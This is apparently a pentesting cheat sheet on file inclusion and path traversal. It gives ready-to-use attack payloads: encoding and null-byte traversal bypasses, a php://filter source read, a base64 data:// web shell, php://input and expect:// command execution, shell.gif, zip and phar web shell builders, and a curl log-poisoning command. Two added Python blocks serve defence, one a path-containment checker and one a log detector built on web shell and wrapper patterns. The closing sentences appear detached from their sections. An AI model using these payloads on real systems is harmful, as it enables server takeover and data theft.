
File Inclusion/Path Traversal

Last updated 6 days ago


A vulnerability in which a user-controlled parameter is used, without proper validation, to include files and resources in the web page.

Tools

Tool | Details
liffy | Tests for Local File Inclusion vulnerabilities: python3 liffy.py http://<DOMAIN>/?<PARAM>= <OPTIONS>

Functions

PHP
Function | Read Content | Execute | Remote URL
include()/include_once() | ✅ | ✅ | ✅
require()/require_once() | ✅ | ✅ | ❌
file_get_contents() | ✅ | ❌ | ✅
fopen()/file() | ✅ | ❌ | ❌

NodeJS
Function | Read Content | Execute | Remote URL
fs.readFile() | ✅ | ❌ | ❌
fs.sendFile() | ✅ | ❌ | ❌
res.render() | ✅ | ✅ | ❌

Java
Function | Read Content | Execute | Remote URL
include | ✅ | ❌ | ❌
import | ✅ | ✅ | ✅

.NET
Function | Read Content | Execute | Remote URL
@Html.Partial() | ✅ | ❌ | ❌
@Html.RemotePartial() | ✅ | ❌ | ✅
Response.WriteFile() | ✅ | ❌ | ❌
include | ✅ | ✅ | ✅

Local File Inclusion (LFI)

Files to try to read:

  • Linux: /etc/passwd

  • Windows: C:\Windows\boot.ini or C:\Windows\win.ini

It is possible to try different payloads from SecLists, in particular LFI-Jhaddix.txt.

Bypassing Filters

Payload | Filter bypassed
....//....//....// | Non-recursive regex/strip that removes ../ once (the removal leaves ../ behind)
%2e%2e%2f%2e%2e%2f | Encoding (../../../../)
%25%32%65%25%32%65%25%32%66 | Double Encoding (../../../../)
../../<FILE>%00.png | Null Byte (PHP <5.5)
<PATH>/../../<FILE> | Forced initial path
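Seen from the defensive side, every row of this table defeats a check that looks at the value before the server has finished interpreting it. The Python below is an added example, not code from the original page: it canonicalises a path parameter the way the target stack eventually will (repeated URL decoding, NUL truncation, separator unification) and then checks whether the resolved path stays inside an assumed web root /srv/app/pages. It also models the one-shot ../ strip that the ....// row is built to defeat. The web root, the decode bound and the sample values in main() are constructed assumptions.

```python
"""Canonicalise-then-contain check for path traversal parameters.

Added example (not from the original page). WEB_ROOT and MAX_DECODE_ROUNDS
are assumptions; the sample values in main() are constructed from the table.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/app/pages"       # assumed directory the include is meant to stay in
MAX_DECODE_ROUNDS = 3             # assumed upper bound on layered URL-encoding
IMAGE_EXTENSIONS = (".png", ".jpg", ".gif")


def canonicalize(raw: str) -> str:
    """Decode the value the way the target stack eventually will:
    undo layered URL-encoding, truncate at a NUL byte (PHP < 5.5 did this
    when opening files) and unify path separators."""
    value = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.split("\x00", 1)[0]
    return value.replace("\\", "/")


def weak_strip(value: str) -> str:
    """Single-pass '../' removal: the filter that '....//' is built to defeat."""
    return value.replace("../", "")


def escapes_root(user_path: str, root: str = WEB_ROOT) -> bool:
    """Containment check: join with the root, normalise lexically, compare.
    posixpath.normpath keeps this filesystem-independent; production code
    should additionally resolve symlinks with os.path.realpath."""
    resolved = posixpath.normpath(posixpath.join(root, user_path))
    return not (resolved == root or resolved.startswith(root + "/"))


def audit(raw: str) -> dict:
    """Evaluate one parameter value against several checks at once."""
    canonical = canonicalize(raw)
    return {
        "canonical": canonical,
        # a blacklist applied to the undecoded string misses encoded payloads
        "raw_blacklist_hit": "../" in raw,
        # an extension allowlist applied before NUL truncation is fooled by %00
        "extension_check_passes": unquote(raw).lower().endswith(IMAGE_EXTENSIONS),
        # the check that matters: does the canonical path leave the root?
        "escapes_root": escapes_root(canonical),
        # what happens if the app strips '../' once and then uses the result
        "escapes_after_weak_strip": escapes_root(weak_strip(canonical)),
    }


def is_attack(raw: str) -> bool:
    """Flag a value if it leaves the root directly or after a one-shot strip."""
    result = audit(raw)
    return result["escapes_root"] or result["escapes_after_weak_strip"]


if __name__ == "__main__":
    # constructed values: one benign, then one per row of the table above
    samples = [
        "en/index.html",
        "....//....//....//etc/passwd",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
        "%25%32%65%25%32%65%25%32%66" * 3 + "etc/passwd",
        "../../../etc/passwd%00.png",
        "languages/../../../../etc/passwd",
    ]
    for sample in samples:
        print(f"{sample!r:45} attack={is_attack(sample)} {audit(sample)}")
```

The point the output makes is that the ....// value is harmless when resolved as-is and becomes a traversal only after a strip filter mangles it, while the encoded rows never contain ../ until decoding has happened; validating the canonical path against the root catches all of them without any blacklist.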

Read Source PHP

php://filter/read=convert.base64-encode/resource=config.php

In particular, try to read the main PHP configuration file, php.ini, where you can see whether allow_url_include is enabled. It is usually located in:

  • Apache : /etc/php/X.Y/apache2/php.ini

  • Nginx: /etc/php/X.Y/fpm/php.ini

where X.Y is the installed PHP version (brute-force the version if it is unknown).

RCE PHP

Requires allow_url_include.

The data wrapper allows you to include external data, including PHP code, and execute it. The code can be passed as base64.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

The php://input wrapper is similar to the data wrapper but takes the code from the POST body, which is useful when the server only accepts POST requests.

php://input + POST with data: '<?php system('<CMD>');?>'
php://input&cmd=id + POST with data: '<?php system($_GET["cmd"]);?>'

The expect wrapper is dedicated to executing commands, but it is an external extension that must have been installed manually (check for extension=expect in php.ini).

expect://id

Remote File Inclusion (RFI)

The file is loaded from a remote server. In PHP this is disabled by default and requires allow_url_include.

On Windows, however, SMB can be used to include a remote file without allow_url_include. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path (//server/share/file). This technique is more likely to work if we are on the same network, since access to remote SMB servers over the Internet may be disabled by default, depending on the Windows server configuration.

RCE

If the included file is executed, a webshell written in the language used by the server can be hosted on a host the target can reach and then included via the RFI.

It is also possible to apply SSRF techniques, such as port scanning.

File Upload + LFI

If the site offers file uploads (even non-vulnerable ones) combined with an LFI whose function executes the included file, the uploaded files can be used to obtain RCE.

Create a file that passes as a real image (e.g. a GIF, by starting it with the GIF8 magic bytes) and contains only a short PHP webshell. Upload it, obtain its path and use that path in the LFI.

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
zip://<PATH_TO_ZIP>/<ZIP>#<FILE_IN_ZIP>
zip://<PATH_TO_ZIP>/shell.jpg%23shell.php&cmd=id

Write the following PHP script:

shell.php
<?php
// Build a phar archive whose sub-file shell.txt holds the web shell
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
// Minimal stub: the archive only needs to be readable through phar://
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

Running this script produces a phar archive containing the sub-file shell.txt, which holds the web shell; once the archive is on the server we can reach that sub-file through the phar:// wrapper and interact with it.

Compile it and rename the result to shell.jpg:

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
phar://<PATH_TO_PHAR>/<PHAR>/<SUBFILE>
phar://<PATH_TO_PHAR>/shell.jpg%2Fshell.txt&cmd=id

Log Poisoning

If the LFI function executes the included file, you can try to poison log files by injecting code (e.g. PHP) into them and then including them through the LFI.

PHP session files store user-specific backend data, keyed by the PHPSESSID cookie. Examine the session file via the LFI to see what information it contains and whether any of it is user-controlled and can be poisoned.

  • Linux: /var/lib/php/sessions/sess_<PHPSESSID>

  • Windows: C:\Windows\Temp\sess_<PHPSESSID>

Both Apache and Nginx maintain log files (access.log and error.log). access.log records every request made to the server, including the User-Agent header, which we control; this is what we use to poison the log. Read access to the logs is required: Nginx by default makes its logs readable by low-privileged users (like www-data), whereas Apache logs are readable only by high-privileged users (except on old or badly configured installations). Be aware that a malformed payload (for example one with a PHP syntax error) breaks every later inclusion of that log and so blocks access to it.

access.log and error.log are located in:

  • Apache:

    • Linux: /var/log/apache2/

    • Windows: C:\xampp\apache\logs

  • Nginx:

    • Linux: /var/log/nginx/

    • Windows: C:\nginx\log\

curl <URL> -A "<?php system(\$_GET['cmd']); ?>"

The User-Agent also appears in process files under the Linux /proc/ directory, so we can try to include /proc/self/environ and /proc/self/fd/N (where N is a file descriptor number, usually between 0 and 50) and perform the same attack on those files. This may be useful if we don't have read access to the server logs; however, these files may only be readable by privileged users.

There are other similar log poisoning techniques that we could use on various system logs, depending on which logs we have read access to.

Some of the logs we could read:

  • /var/log/sshd.log

  • /var/log/mail

  • /var/log/vsftpd.log
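From the detection side, the traces this section describes are visible in the very logs being poisoned. The Python below is an added example, not code from the original page: it parses a few constructed Apache/Nginx combined-format access log lines and flags three indicators discussed above, a PHP tag in the User-Agent or Referer header, a stream wrapper (php, data, expect, zip, phar) in the request, and a request value pointing at a log, session, /proc or other sensitive file. The IP addresses, timestamps, base64 string and log lines are constructed.

```python
"""Flag file-inclusion and log-poisoning indicators in access logs.

Added example (not from the original page). SAMPLE_LOG, its addresses,
timestamps and payload strings are constructed; the indicator lists
reflect the wrappers and paths discussed on this page.
"""
import re
from urllib.parse import unquote

# Apache/Nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# stream wrappers that turn an include into a read or execute primitive
WRAPPER_RE = re.compile(r"\b(?:php|data|expect|zip|phar):", re.IGNORECASE)
# opening tag of injected PHP, the thing log poisoning plants in a header
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# files an attacker includes to read back poisoned or sensitive content
SENSITIVE_TARGETS = (
    "/var/log/", "/proc/self/", "/var/lib/php/sessions", "sess_",
    "/etc/passwd", "php.ini",
)

# constructed sample: one benign request followed by four suspicious ones
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:12:00:09 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:12:00:17 +0000] "GET /index.php?language=en HTTP/1.1" 200 1043 "-" "<?php system($_GET['cmd']); ?>"
203.0.113.7 - - [10/Mar/2025:12:00:25 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [10/Mar/2025:12:00:33 +0000] "GET /index.php?language=data://text/plain;base64,QkFTRTY0&cmd=id HTTP/1.1" 200 300 "-" "curl/8.5.0"
"""


def analyze_line(line: str):
    """Return a finding dict (reasons may be empty) or None if unparsable."""
    match = LOG_RE.match(line.strip())
    if not match:
        return None
    uri = unquote(match["uri"])  # decode once so %2F-style encoding does not hide paths
    reasons = []
    if WRAPPER_RE.search(uri):
        reasons.append("wrapper_in_request")
    if PHP_TAG_RE.search(match["agent"]) or PHP_TAG_RE.search(match["referer"]):
        reasons.append("php_tag_in_header")
    if any(target in uri.lower() for target in SENSITIVE_TARGETS):
        reasons.append("sensitive_path_in_request")
    return {"ip": match["ip"], "time": match["time"], "uri": uri, "reasons": reasons}


def scan(log_text: str) -> list:
    """Return only the parsed lines that carry at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        result = analyze_line(line)
        if result and result["reasons"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["time"]} {finding["ip"]} {",".join(finding["reasons"])} {finding["uri"]}')
```

A PHP tag in a request header is the clearest signal of an attempted poisoning and has no legitimate cause; the wrapper and path indicators are broader and are best used to raise the priority of a source address that also trips the header check.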

If the included code is being interpreted and executed, but you want to read the source instead, you can use wrappers and filters.

In this case we upload a zip: create a webshell, wrap it in a zip archive, upload the zip, then access it via the zip wrapper in the LFI. However, this wrapper is not enabled by default and may not always work.

Similar result to the zip case, but via the phar wrapper.

These log paths can vary between systems and configurations.
